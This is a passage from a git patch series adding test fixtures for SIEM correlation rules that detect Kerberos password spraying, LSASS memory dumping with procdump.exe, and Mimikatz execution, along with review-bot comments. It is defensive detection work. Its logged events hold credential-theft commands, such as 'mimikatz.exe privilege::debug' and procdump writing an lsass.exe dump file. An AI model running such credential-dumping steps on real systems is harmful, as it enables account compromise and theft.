"4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "mc1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:31:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f8f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30a}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:33:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"bob1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", 
"datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "bob1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:33:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e522f"} +{"action": "login", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30b}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:34:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"corn1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", 
"msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "corn1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:34:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e523f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30r}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:35:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"smoorf1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": 
"THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:35:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e524f"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "execute", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Brute Force: Password Spraying", "correlation_name": "Kerberos_pwd_spraying", "correlation_type": "incident", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "low", "incident.aggregation.key": "Kerberos_pwd_spraying|172.16.66.1", "incident.aggregation.timeout": 3600, "incident.category": "UserCompromising", "incident.severity": "low", "object": "request", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf1"}
\ No newline at end of file
From f6774e092ee323632dbe756c9760f687db4d3b73 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Sat, 29 Jul 2023 18:55:03 +0300
Subject: [PATCH 10/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(LSASS=5FDump=5FCreate)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc
new file mode 100644
index 00000000..0788761c
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/LSASS_ProcDump/tests/test_1.sc 
@@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"10\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"10\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:09:41.3288680Z\"},\"EventRecordID\":\"4434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:09:41.328\"},{\"Name\":\"SourceProcessGUID\",\"text\":\"{365abb72-9b75-5c8e-0000-0010013f1200}\"},{\"Name\":\"SourceProcessId\",\"text\":\"1856\"},{\"Name\":\"SourceThreadId\",\"text\":\"980\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe\"},{\"Name\":\"TargetProcessGUID\",\"text\":\"{365abb72-0886-5c8f-0000-001030560000}\"},{\"Name\":\"TargetProcessId\",\"text\":\"476\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"GrantedAccess\",\"text\":\"0x1fffff\"},{\"Name\":\"CallTrace\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+4595c|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+1d4da|C:\\\\Windows\\\\system32\\\\kernel32.dll+3cc47|C:\\\\Windows\\\\system32\\\\kernel32.dll+3ff99|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4c791|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4dcab|C:\\\\Windows\\\\system32\\\\dbghelp.dll+4a1b8|C:\\\\Windows\\\\system32\\\\dbghelp.dll+45b81|C:\\\\Windows\\\\system32\\\\dbghelp.dll+45e2a|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11a8d|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+116a6|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11610|C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe+11356|C:\\\\Windows\
\\\system32\\\\kernel32.dll+4ef8c|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6367a|C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+6364d\"}]}}}", "category.generic": "Process", "category.high": "System Management", "category.low": "Manipulation", "datafield5": "980", "datafield9": "C:\\Windows\\SYSTEM32\\ntdll.dll+4595c|C:\\Windows\\SYSTEM32\\ntdll.dll+1d4da|C:\\Windows\\system32\\kernel32.dll+3cc47|C:\\Windows\\system32\\kernel32.dll+3ff99|C:\\Windows\\system32\\dbghelp.dll+4c791|C:\\Windows\\system32\\dbghelp.dll+4dcab|C:\\Windows\\system32\\dbghelp.dll+4a1b8|C:\\Windows\\system32\\dbghelp.dll+45b81|C:\\Windows\\system32\\dbghelp.dll+45e2a|C:\\Users\\IEUser\\Desktop\\procdump.exe+11a8d|C:\\Users\\IEUser\\Desktop\\procdump.exe+116a6|C:\\Users\\IEUser\\Desktop\\procdump.exe+11610|C:\\Users\\IEUser\\Desktop\\procdump.exe+11356|C:\\Windows\\system32\\kernel32.dll+4ef8c|C:\\Windows\\SYSTEM32\\ntdll.dll+6367a|C:\\Windows\\SYSTEM32\\ntdll.dll+6364d", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_10_Process_access", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "10", "normalized": true, "object": "process", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "GrantedAccess", "object.value": "0x1fffff", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T08:45:00.165Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", 
"subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:09:41.328Z", "type": "raw", "uuid": "75b68542-dad6-4a5a-9166-494ff20a9d45"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-17T19:09:41.3288680Z\"},\"EventRecordID\":\"4433\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"344\",\"ThreadID\":\"2032\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"PC04.example.corp\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-03-17 19:09:41.318\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-9b75-5c8e-0000-0010013f1200}\"},{\"Name\":\"ProcessId\",\"text\":\"1856\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\procdump.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\lsass.exe_190317_120941.dmp\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-03-17 19:09:41.318\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "pc04.example.corp", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": 
"PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\desktop\\lsass.exe_190317_120941.dmp", "object.name": "lsass.exe_190317_120941.dmp", "object.path": "c:\\users\\ieuser\\desktop\\", "object.property": "creation time", "object.value": "2019-03-17T19:09:41.318Z", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-03T08:45:00.165Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", "subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-17T19:09:41.318Z", "type": "raw", "uuid": "c7f7e825-4f3e-47b4-920e-3e111f20d163"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "create", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "LSASS_ProcDump", "correlation_type": "incident", "event_src.category": "Other", "event_src.host": "pc04.example.corp", "event_src.hostname": "pc04", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.category": "SoftwareSuspiciousActivity", "incident.severity": "high", "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\desktop\\lsass.exe_190317_120941.dmp", "object.name": "lsass.exe_190317_120941.dmp", "object.path": "c:\\users\\ieuser\\desktop\\", "object.process.fullpath": "c:\\windows\\system32\\lsass.exe", "object.process.guid": "365abb72-0886-5c8f-0000-001030560000", "object.process.id": "476", "object.process.name": "lsass.exe", "object.process.path": "c:\\windows\\system32\\", "object.property": "creation time", "object.value": "2019-03-17T19:09:41.318Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\desktop\\procdump.exe", "subject.process.guid": "365abb72-9b75-5c8e-0000-0010013f1200", "subject.process.id": "1856", "subject.process.name": "procdump.exe", "subject.process.path": "c:\\users\\ieuser\\desktop\\"}
+
From 1eba4650384fc46f422e8441f35cd1a228a743e8 Mon Sep 17 00:00:00 2001 
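Review bot: The two fixture records are fed in the opposite order to their timestamps — the Sysmon 10 access record (`EventRecordID` 4434, `"time": "2019-03-17T19:09:41.328Z"`) comes first and the Sysmon 11 file-create record (`EventRecordID` 4433, `"time": "2019-03-17T19:09:41.318Z"`) second — so if the LSASS_ProcDump rule orders the pair by event time rather than arrival order, the dump-file creation here precedes the lsass access and `expect 1` would hold only by accident; either swap the two records to match record order or state in the fixture that arrival order is intentional. The scaffold text `# Тут будет твой тест. В секции expect укажи ...` is kept verbatim; a one-line scenario description such as `# procdump.exe opens lsass.exe (Sysmon 10, GrantedAccess 0x1fffff) and then writes lsass.exe_*.dmp (Sysmon 11): one LSASS_ProcDump incident expected` would document what the expect block asserts. The expected incident lists `event_src.host` and `event_src.hostname` but not `event_src.fqdn`, which both input records carry; if the harness compares only the listed keys this is harmless, otherwise confirm the rule really drops that field. Only the positive path is covered; a second fixture with `expect 0` (for example the same Sysmon 10 record with no following `.dmp` creation) would guard the rule against false positives when its conditions are later tuned.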
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Sat, 29 Jul 2023 19:03:34 +0300
Subject: [PATCH 11/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Mimikatz?= =?UTF-8?q?)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../mitre_attck_cred_access/Mimikatz/tests/test_1.sc | 4 ++++
 .../mitre_attck_cred_access/Mimikatz/tests/test_2.sc | 4 ++++
 .../mitre_attck_cred_access/Mimikatz/tests/test_3.sc | 4 ++++
 3 files changed, 12 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_3.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc
new file mode 100644
index 00000000..603be60f
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-01-23T10:18:31.616030800Z\"},\"EventRecordID\":\"6925090\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"5460\"},\"Channel\":\"Security\",\"Computer\":\"WIN10X64-133.testlab.org\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-5-21-3389064948-2957360831-125328159-1105\",\"Name\":\"SubjectUserSid\"},{\"text\":\"test-admin\",\"Name\":\"SubjectUserName\"},{\"text\":\"TESTLAB\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x1c3869\",\"Name\":\"SubjectLogonId\"},{\"text\":\"0xb28\",\"Name\":\"NewProcessId\"},{\"text\":\"C:\\\\Users\\\\test-admin\\\\Documents\\\\Tools for raw events\\\\mimikatz\\\\x64\\\\mimikatz.exe\",\"Name\":\"NewProcessName\"},{\"text\":\"%%1937\",\"Name\":\"TokenElevationType\"},{\"text\":\"0x1530\",\"Name\":\"ProcessId\"},{\"text\":\"\\\"C:\\\\Users\\\\test-admin\\\\Documents\\\\Tools for raw events\\\\mimikatz\\\\x64\\\\mimikatz.exe\\\" privilege::debug\",\"Name\":\"CommandLine\"},{\"text\":\"S-1-0-0\",\"Name\":\"TargetUserSid\"},{\"text\":\"-\",\"Name\":\"TargetUserName\"},{\"text\":\"-\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x0\",\"Name\":\"TargetLogonId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"Name\":\"ParentProcessName\"},{\"text\":\"S-1-16-12288\",\"Name\":\"MandatoryLabel\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10x64-133.testlab.org", "event_src.host": "win10x64-133.testlab.org", "event_src.hostname": 
"win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "historical": false, "id": "PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "d8c86b6f-83bf-4c13-921b-a8403077119a", "job_id": "a4d09d11-927a-4cb6-9f4f-971106247fdd", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "object.account.name": "test-admin", "object.account.session_id": "1849449", "object.process.cmdline": "\"C:\\Users\\test-admin\\Documents\\Tools for raw events\\mimikatz\\x64\\mimikatz.exe\" privilege::debug", "object.process.fullpath": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\mimikatz.exe", "object.process.id": "2856", "object.process.name": "mimikatz.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "5424", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\", "recv_ipv4": "192.168.40.146", "recv_time": "2020-01-27T06:12:53Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "subject.account.name": "test-admin", "subject.account.privileges": "TokenElevationTypeFull", "subject.account.session_id": "1849449", "subject.state": "on behalf of oneself", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-01-23T10:18:31.616Z", "uuid": "00000005-e2e7-0f65-f000-0000119dd0a4"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping", "correlation_name": "Mimikatz", "correlation_type": "incident", "event_src.fqdn": "win10x64-133.testlab.org", "event_src.host": "win10x64-133.testlab.org", "event_src.hostname": "win10x64-133", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Mimikatz|win10x64-133.testlab.org|s-1-5-21-3389064948-2957360831-125328159-1105", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "object.account.name": "test-admin", "object.account.session_id": "1849449", "object.process.cmdline": "\"C:\\Users\\test-admin\\Documents\\Tools for raw events\\mimikatz\\x64\\mimikatz.exe\" privilege::debug", "object.process.fullpath": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\mimikatz.exe", "object.process.id": "2856", "object.process.name": "mimikatz.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.id": "5424", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\users\\test-admin\\documents\\tools for raw events\\mimikatz\\x64\\", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-3389064948-2957360831-125328159-1105", "subject.account.name": "test-admin", "subject.account.privileges": "TokenElevationTypeFull", "subject.account.session_id": "1849449"} 
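Review bot: The comment line `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is the scaffold placeholder rather than a description of this case; the same placeholder is committed in Mimikatz/tests/test_2.sc and test_3.sc in this patch and in Mimikatz_Memssp_Default_Log_Detected/tests/test_1.sc in PATCH 12. Replace it with one line stating what the case covers and why it must fire, e.g. `# Security 4688: mimikatz.exe started from powershell.exe with "privilege::debug"; exactly one Mimikatz incident expected`. A reader then sees at a glance which rule condition each test pins, which matters once a rule is tuned and a test starts failing.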
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Mimikatz/tests/test_2.sc
new file mode 100644
index 00000000..9ff76027
--- /dev/null
